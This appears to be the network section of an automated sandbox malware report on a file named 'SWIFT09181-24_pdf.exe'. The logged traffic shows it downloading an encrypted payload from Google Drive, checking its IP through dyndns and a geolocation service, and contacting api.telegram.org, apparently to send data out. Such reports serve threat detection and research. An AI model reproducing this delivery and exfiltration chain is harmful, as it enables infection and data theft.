                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Dec 15, 2024 18:29:43.236304045 CET1.1.1.1192.168.2.40x2e44No error (0)drive.google.com216.58.208.238A (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:46.016710043 CET1.1.1.1192.168.2.40x5fc5No error (0)drive.usercontent.google.com172.217.17.65A (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:51.755301952 CET1.1.1.1192.168.2.40xbd8dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:51.755301952 CET1.1.1.1192.168.2.40xbd8dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:51.755301952 CET1.1.1.1192.168.2.40xbd8dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:51.755301952 CET1.1.1.1192.168.2.40xbd8dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:51.755301952 CET1.1.1.1192.168.2.40xbd8dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:51.755301952 CET1.1.1.1192.168.2.40xbd8dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:54.191927910 CET1.1.1.1192.168.2.40x3259No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:54.191927910 CET1.1.1.1192.168.2.40x3259No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:30:02.042350054 CET1.1.1.1192.168.2.40xca3cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                  • drive.google.com
                                                                                                                                  • drive.usercontent.google.com
                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                  • api.telegram.org
                                                                                                                                  • checkip.dyndns.org
                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.449858193.122.130.0806020C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 15, 2024 18:29:51.882936001 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 15, 2024 18:29:53.020834923 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Sun, 15 Dec 2024 17:29:52 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 1c55c299182855f63add6ab6f81f2476
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                  Dec 15, 2024 18:29:53.080347061 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 15, 2024 18:29:53.458142996 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Sun, 15 Dec 2024 17:29:53 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 1ab230af0c1dd111f12a5362f1c7d074
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                  Dec 15, 2024 18:30:01.425071001 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 15, 2024 18:30:01.893702030 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Sun, 15 Dec 2024 17:30:01 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: d6a806db51b56cbed9fd023111824388
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.449837216.58.208.2384436020C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-15 17:29:45 UTC216OUTGET /uc?export=download&id=138pqZxsrel6pv22ZzsGxQKK8bi-dritC HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                  Host: drive.google.com
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  2024-12-15 17:29:45 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Sun, 15 Dec 2024 17:29:45 GMT
                                                                                                                                  Location: https://drive.usercontent.google.com/download?id=138pqZxsrel6pv22ZzsGxQKK8bi-dritC&export=download
                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                  Content-Security-Policy: script-src 'nonce-qEaxtTOsE_XJWG3pPdC9rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.449846172.217.17.654436020C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-15 17:29:47 UTC258OUTGET /download?id=138pqZxsrel6pv22ZzsGxQKK8bi-dritC&export=download HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-15 17:29:50 UTC4932INHTTP/1.1 200 OK
                                                                                                                                  X-GUploader-UploadID: AFiumC62fTCKqa_oR-I2MPC-bTqT3oB7ic6S207RkT0XRUOfj241nteTfJztf62jrLpu7ks1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Content-Disposition: attachment; filename="bIvDKwZtKo15.bin"
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 94272
                                                                                                                                  Last-Modified: Sun, 15 Dec 2024 10:12:47 GMT
                                                                                                                                  Date: Sun, 15 Dec 2024 17:29:50 GMT
                                                                                                                                  Expires: Sun, 15 Dec 2024 17:29:50 GMT
                                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                                  X-Goog-Hash: crc32c=TSOSBQ==
                                                                                                                                  Server: UploadServer
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                  Connection: close
                                                                                                                                  2024-12-15 17:29:50 UTC4932INData Raw: 9a 53 28 a4 85 90 59 38 b7 2b 21 9e cf 45 12 a1 99 62 34 bc d3 3c 1d 9b 88 c7 ca 39 ec b3 af 45 66 8d e2 86 ac 05 7e 2d 93 ae bf 8e 48 e7 77 4e 09 be f4 95 16 9d d9 0d 45 da d2 47 57 c4 d2 96 06 9d c0 c3 36 0b 4b 98 8a 3f 53 c1 71 43 14 1f d6 ae 61 2b 53 6c a8 59 31 63 f0 60 d0 e8 07 36 b4 0a ed 86 4c c3 2d 65 4f 8b f3 31 14 68 24 21 b3 22 2e b7 de 6f 89 69 f8 16 94 c5 00 3f b7 ad 5c f8 8f 42 67 81 a1 ac f4 83 a2 d7 66 3f d5 9a fd 8a f6 45 b8 bd c1 cf a3 a8 77 e1 85 16 8a cb a3 44 3f 1e 01 67 c4 1d d5 8f f3 de da 35 e7 87 81 ff 8c a7 59 fb 4c 5f 6c 2e cd a6 e2 4a c3 9b 67 24 80 73 43 ac f5 53 51 f0 f8 ec a8 92 78 17 1c 0e 03 99 a7 4c 65 05 15 b7 02 76 bf 9b 7d 20 0b 06 99 c9 06 73 26 a2 99 00 e9 95 e7 e1 51 6d b1 97 c2 dd eb b0 84 97 00 6c 50 82 50 00 57
                                                                                                                                  Data Ascii: S(Y8+!Eb4<9Ef~-HwNEGW6K?SqCa+SlY1c`6L-eO1h$!".oi?\Bgf?EwD?g5YL_l.Jg$sCSQxLev} s&QmlPPW
                                                                                                                                  2024-12-15 17:29:50 UTC4835INData Raw: b7 88 de 13 ca ae 5c 1d 7b 82 fd 2b 92 b4 64 08 6f 8a 3d 01 83 fa a2 e9 59 98 ae 19 97 69 35 e3 20 40 4d b6 e0 8d f0 e0 56 16 93 e4 f3 24 ac ab 06 39 27 12 4c 1b ea ae 9b 99 0b 27 7c 80 68 a3 eb 41 d6 a9 79 e6 36 e1 d1 50 a9 0a 36 f4 4e 53 23 2a f9 d2 b1 55 97 83 98 13 75 b2 bf ff 2b 19 ff b4 d7 92 a9 79 1a 34 00 51 0f 3e 63 4d 4e b5 a0 72 c0 b7 7f 51 93 cc 24 51 aa ac ab 4f 25 55 a1 b5 76 b1 b1 1c 55 a9 43 76 19 35 61 f3 da 9b c3 5e b5 5d 54 20 f3 6f de 05 c9 b9 e0 a0 70 11 ea b3 be 9e 20 86 1b 42 25 53 d8 2a ad 1d 69 c4 12 ef d1 5b 8b 44 38 33 c0 ca eb 94 ef 24 81 51 2f 18 22 b7 ba 10 78 91 d8 5d 73 03 06 e6 96 12 4a f9 5b 72 f6 fb 2a d1 9c 73 8b 0d 73 cf 35 da 30 92 7f a0 14 3f 4c 8f c5 0b 90 04 cb f3 e2 70 ee 33 60 40 52 0f 73 01 4d af 0d 6d 5a c2 ea
                                                                                                                                  Data Ascii: \{+do=Yi5 @MV$9'L'|hAy6P6NS#*Uu+y4Q>cMNrQ$QO%UvUCv5a^]T op B%S*i[D83$Q/"x]sJ[r*ss50?Lp3`@RsMmZ
                                                                                                                                  2024-12-15 17:29:50 UTC1321INData Raw: e9 97 b9 07 c3 cc 3a f9 3c ca 93 99 92 2b ee b9 1d b6 c4 b1 39 82 4f ea fe c0 52 24 7b a9 8b 93 90 58 f4 66 e7 69 46 a2 f7 47 7c bb 2d 7a e2 1a d5 71 29 b3 ea 07 76 d0 75 07 ed 87 ea 89 2d b7 c9 bf 84 d5 8b cf 9c c0 10 ce 08 b7 2a 7b d5 d1 6e 31 38 d1 74 fd 12 ee e1 6f 0c f6 b4 38 36 fb f8 5c 40 a7 7a d4 b8 a2 a9 43 af 1b a9 54 d6 cf 6d 86 e0 c7 a0 bc 6a b2 fa c9 ed 93 9a 8c 0c a4 85 bf ec 16 9c f0 66 22 3c 69 15 2f 76 05 89 3e cd 4a 00 ad 96 b3 c1 51 82 ec d6 47 15 a5 bc 0f 8d f7 c5 d4 de 0b 10 b8 7c 5f ca 8b 1c 3f 04 55 fe 17 40 71 5e cb 5b da e2 fc ed a9 6a 0a 46 83 7a b7 04 0f b8 f9 05 b2 dc 21 42 3a ca 2b 80 f9 43 64 7f 27 3b 76 b3 19 2c 98 b5 9f 7b fd e8 1e 86 6b 13 3b fe 2f 04 8c 14 52 7f e6 32 6b c6 49 90 13 dd 2f d6 d6 e9 22 5e 6d 7f 88 85 06 00
                                                                                                                                  Data Ascii: :<+9OR${XfiFG|-zq)vu-*{n18to86\@zCTmjf"<i/v>JQG|_?U@q^[jFz!B:+Cd';v,{k;/R2kI/"^m
                                                                                                                                  2024-12-15 17:29:50 UTC1390INData Raw: 62 58 af a8 35 25 16 1f 40 d9 af 51 8e 94 4c 99 b9 b4 d9 f5 ee b1 cc c3 ef 92 1e 8f cf 7e 72 80 76 7e 09 ee a1 ac 16 30 25 85 ea 1e 80 d5 cc 61 3f 78 4f 45 2f 1f e8 e1 95 e2 a1 a3 0f 21 a2 7a 78 b1 5c 9b 22 d8 10 aa 5c f2 9b 79 7a 68 e9 c3 c6 33 37 cd 23 32 4b 22 49 ff e7 86 d2 78 c4 b4 7f 6a 03 dc b0 ba ba 3e e2 de 83 bf b7 77 ed b4 1d 43 9d 12 e7 9f 80 d4 fd 34 81 df ef 13 17 0e df 44 f8 50 6d 03 88 25 35 01 01 04 61 75 4c 81 f2 47 ee 98 28 d3 a2 d4 23 b6 c7 0b e2 c7 30 e3 9a 4b 0a 73 f4 a9 cf cc 0f be 1d d1 46 3d 76 bd 1f 22 ca 39 10 df 3f 0c 45 d3 48 e9 ab 3c dc a9 7d 07 7b 3b 8f 7f e1 cf 25 84 92 62 8e a3 51 79 3d a3 84 20 6f b2 eb d0 2a ee a4 94 cf d3 5b 42 2e a2 1a fc bc 23 ca 94 cf 7a 56 36 99 e9 68 a4 aa 0b 7f 74 84 69 d5 23 ce 5d 25 66 b1 37 e8
                                                                                                                                  Data Ascii: bX5%@QL~rv~0%a?xOE/!zx\"\yzh37#2K"Ixj>wC4DPm%5auLG(#0KsF=v"9?EH<}{;%bQy= o*[B.#zV6hti#]%f7
                                                                                                                                  2024-12-15 17:29:50 UTC1390INData Raw: 5a db 58 0b 0d 69 43 cc a0 a6 5c 5a c9 23 2d 35 0b 41 8b 81 2e 5d d0 80 ce 44 05 6e de 0e c0 53 6c a2 4e a7 0c 1f 60 d0 e2 14 26 a5 04 9f d2 56 c3 5d 4d 01 8b f3 3b 07 79 35 30 aa 51 de b7 de 65 9a 7b e9 04 fb 34 80 3f bd 1a 41 f4 24 5f 70 ef bf b7 58 62 a3 9b aa 0d 95 e4 87 ec a4 d7 cf d2 d6 ae d4 d4 45 93 f0 6e f5 b7 b8 96 5d 7b 2b 33 a0 67 e3 77 bd 2e 9e 7a b4 59 ed 83 ff d3 60 e5 58 44 51 02 cb b0 f1 52 c3 b0 32 61 97 60 17 ad e7 40 f1 10 9e 47 be 81 63 2f 2a 0c 03 99 56 58 76 1f 8f a9 72 47 a8 ec 68 31 10 9f 86 b6 29 7d 37 b6 56 9e 79 8a da 3f 50 7b 4f 36 e8 dc fd a3 d8 86 1c 5f 4d 93 4d 3b ae 8f 30 29 c4 87 17 58 92 6d 02 a0 79 ec 45 eb bd 54 3a d9 0f af e6 7f b8 bd 80 b3 29 03 20 1c 44 bc 5b 94 8e d5 0f 7a 82 0f f5 65 f4 dd ad 82 bb 0d 6b ea ed 2d
                                                                                                                                  Data Ascii: ZXiC\Z#-5A.]DnSlN`&V]M;y50Qe{4?A$_pXbEn]{+3gw.zY`XDQR2a`@Gc/*VXvrGh1)}7Vy?P{O6_MM;0)XmyET:) D[zek-
                                                                                                                                  2024-12-15 17:29:50 UTC1390INData Raw: 96 62 82 f8 43 fc 81 2b fd 06 ed 0c 55 aa 0a 36 c5 4e 53 4c 32 fb a0 7d 3c c1 f8 b0 2d 63 9a 34 f4 3d 9e b0 4a d6 80 a0 6f 37 f5 1b 50 05 28 9d 3f cf bc b3 7d c2 b4 42 5e f9 c1 20 51 96 02 26 4f 25 5f bc d9 6d b1 cb 02 37 56 2c f9 13 32 43 77 fb 9b c9 72 21 cd 54 2a ea 69 de 05 8e d4 e0 a0 70 70 92 93 fd ff 00 df 65 42 23 36 cd 10 ad 17 4b 90 1b fe d2 40 84 44 38 38 d3 d1 fc ec 84 de 81 21 5b 16 29 a6 b5 71 e6 8b d4 01 42 55 0c 89 62 7d d9 f3 4c 17 09 85 38 db f3 77 f9 99 79 e7 55 c9 37 89 75 cf 81 3f 5d 8d bb 8c ff 92 c1 e0 e5 61 9d 3e d0 9e 41 6d ec 74 5c a5 1e 64 08 d4 fb 81 ea 51 55 21 10 1d 3f 9e 1a 1b 4c 19 cd b6 fe 0d 8b f7 a9 95 8f a3 f9 b1 3b 1e 89 83 a7 14 5f 3a 4b 95 96 29 a6 e0 6a 29 cd 6d 14 d7 36 bc 64 51 15 c9 10 10 dc 87 8d 30 f3 5c 40 77
                                                                                                                                  Data Ascii: bC+U6NSL2}<-c4=Jo7P(?}B^ Q&O%_m7V,2Cwr!T*ippeB#6K@D88![)qBUb}L8wyU7u?]a>Amt\dQU!?L;_:K)j)m6dQ0\@w
                                                                                                                                  2024-12-15 17:29:50 UTC1390INData Raw: 18 b0 13 58 db 8d 03 32 06 3f b6 08 5c 5d ae 18 5b d0 9a dc f0 a9 18 59 44 83 7a b9 70 5c be d1 f7 9a 88 2b 49 37 fe 64 92 fe 52 65 20 fd 39 0d f9 15 24 ee c7 50 7b 8d 8d cc 86 6b 3f 1d f6 5b e7 86 14 7e 69 3c 21 48 d0 5a 86 2b c8 50 eb d6 e1 37 27 21 17 94 81 08 56 cf ff fa 68 1b df fa b7 c9 c1 a9 db 3c f8 2e 30 65 77 ab 98 f0 d7 29 a7 16 6b 77 51 88 b6 1a 20 46 12 58 68 2c e6 4c 95 cb 98 7f 7f 54 9c a3 d1 e2 07 b4 ad 29 db d7 42 5b d5 b7 58 ac a6 52 c7 1d 65 9d 6f 2a 90 aa 22 83 d3 9e 5b f3 74 03 bc a8 8a d3 c2 ae 28 a5 88 09 88 1d 9d 8d fb ce 73 29 90 7b 88 d8 79 b0 81 6e a9 d9 65 e0 32 c9 a0 14 35 47 fd 01 ea ec c6 02 92 2f b6 6e 82 64 d8 49 70 5c ae 1e e6 df da 05 56 15 e7 df 00 29 56 4a 11 59 88 70 63 96 66 90 ab 3d 06 9b 24 ae 62 a5 9b 45 1c 87 b0
                                                                                                                                  Data Ascii: X2?\][YDzp\+I7dRe 9$P{k?[~i<!HZ+P7'!Vh<.0ew)kwQ FXh,LT)B[XReo*"[t(s){yne25G/ndIp\V)VJYpcf=$bE
                                                                                                                                  2024-12-15 17:29:50 UTC1390INData Raw: 5f 55 e1 79 a6 24 6d 60 22 59 68 d5 23 d3 ce 3c 66 cb 37 32 eb c6 38 2b 8f e2 8c 14 93 eb 56 a0 b5 e7 ae 2f d1 52 01 4e eb 13 d2 e9 ec a4 df 6e be db 43 cf f8 b8 df 3d d6 9a 94 ac dc d1 c7 df 1e 5d cc 79 05 d6 74 ba 4e b5 84 65 a5 9f 44 68 af 49 b8 2b 9b bc 27 c6 03 34 de 0a 34 42 75 48 b4 b1 53 4e 6e c6 31 b7 c8 92 ac cf 9e af 48 95 a9 cf 91 3a 96 49 24 63 59 cf 1c 6b 7e 07 30 c6 08 12 d3 c1 12 15 6b b6 e5 8e 34 47 a6 7a 84 8b 63 07 1a b1 ee 5b 6f 91 36 32 f8 16 17 ba cb de 4f 38 9e 01 b3 ac 2a 0d 5e a8 85 f7 a5 7c 98 bf 71 8d 18 16 92 b5 0d 69 86 4e 1a 50 07 5c f9 b0 a3 e9 d4 3b eb 54 0f f1 c1 5c 8b ba b3 d5 cd d9 6a 0f 42 84 e1 8a 94 67 c9 e3 00 38 93 b9 0d af 81 2d 2f 2b c8 94 9c f8 67 d0 59 e7 4b 40 fa 39 5c 5b e7 04 f3 52 2e 71 b8 80 1d d1 77 b9 66
                                                                                                                                  Data Ascii: _Uy$m`"Yh#<f728+V/RNnC=]ytNeDhI+'44BuHSNn1H:I$cYk~0k4Gzc[o62O8*^|qiNP\;T\jBg8-/+gYK@9\[R.qwf
                                                                                                                                  2024-12-15 17:29:50 UTC1390INData Raw: 4d 82 8c 21 22 fb f2 1c df 62 1c ac 70 8b b7 6c 08 35 a0 30 2c 14 d5 57 bc 65 67 d4 b6 a9 5e f2 87 61 04 24 5b 1e 13 70 76 54 5e 0b 48 0a 47 c5 ea b8 ba 39 4d a7 f7 3a fb dd ce 95 55 c4 98 11 c0 cf f8 59 9d a3 52 b8 2c 54 30 06 1d 2d 43 f5 c8 24 12 b8 25 37 02 8b 19 72 5f 32 33 25 8f f4 bb d2 5a 87 1d e7 57 14 a6 58 4f 44 a6 47 a3 91 78 7f 5d a8 d0 82 29 94 10 78 a4 5f 32 de 15 0b eb c4 f2 1f 9a 65 ca 23 c1 11 5e 4b cc f8 b3 01 8a fb ac b9 42 11 aa 7c b7 da 09 30 16 6f a6 fc b6 59 fa 60 48 99 c3 17 fc ef af f7 d9 d2 9f 2f 27 bc 1e 11 b4 8a 04 4b 88 cb cd f6 38 25 25 ff 42 36 26 fd 34 6b 2c 76 3a 4d 16 59 ed f0 91 cc 9c 74 0f 2b 24 79 70 c3 02 87 30 aa 57 a5 5c f2 97 4c 77 16 3f ee 57 eb 2f 05 32 ca 4b 3d 4e c7 eb e8 d3 78 cc af 78 c4 6b eb b2 ca d5 c1 e3
                                                                                                                                  Data Ascii: M!"bpl50,Weg^a$[pvT^HG9M:UYR,T0-C$%7r_23%ZWXODGx])x_2e#^KB|0oY`H/'K8%%B6&4k,v:MYt+$yp0W\Lw?W/2K=Nxxk
                                                                                                                                  2024-12-15 17:29:50 UTC1390INData Raw: 13 6d 1e fd 77 b1 63 45 03 e1 f7 10 cf 8d 9e 34 7a 7d 65 5f 29 af ea f5 4e f0 bf 57 fd a8 ab 51 7c d3 22 5d 02 09 b1 c9 cc 97 2b ec db b9 d0 2c 28 cf 94 6e 24 45 82 52 bf 45 97 b3 5b e2 74 28 cc cd fc 48 c9 2c c3 eb 91 84 b7 2e 61 60 73 fa 6e 8e e9 25 1a c2 07 38 ba 04 37 96 88 46 d8 09 d8 f7 90 92 f4 2f 5f 91 be 5f 20 31 57 42 88 ab 9c 3e 8f 13 15 08 af 5d ac ad 67 a3 a3 0b 85 1c 11 2a 12 6a d8 eb 23 6e 07 99 c1 ed 06 ee 07 3b 69 b6 5e fa 33 4b c3 b6 8d 0b 1c 63 41 c4 2b b0 7a d8 c7 50 c5 26 03 5a 90 a2 7c 55 e9 8d bd 14 15 01 aa 60 2b 59 03 ad 58 71 69 d8 f4 d0 e8 01 25 bd 1b e4 92 b2 c2 3e 6f 5e 81 e5 cf 15 7b 2f 30 b8 0e 38 9f 74 6f 89 63 e9 13 fb 9a 80 3f bd bc 5b cf a0 4c 67 33 bb 64 d5 3b a3 b0 8b 1e a9 58 94 f9 dc 3d db d5 d4 21 de c5 27 ed 31 78
                                                                                                                                  Data Ascii: mwcE4z}e_)NWQ|"]+,(n$ERE[t(H,.a`sn%87F/__ 1WB>]g*j#n;i^3KcA+zP&Z|U`+YXqi%>o^{/08toc?[Lg3d;X=!'1x


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.449865104.21.67.1524436020C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-15 17:29:55 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-15 17:29:55 UTC882INHTTP/1.1 200 OK
                                                                                                                                  Date: Sun, 15 Dec 2024 17:29:55 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 272564
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMoNB5FhF4fh1f7rL1cGmtBoOKSu%2BY1IhG7riJuP2x6a%2FHGhThm5n7liE9B%2BOa3ebaedLn0AT4TldBjrQdj42Vt%2BmEG68FSX4OnkQt%2BjFsz565ZRiwfkypagu1tujiLBoW%2Fxsugk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f28289b3ddc32e4-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
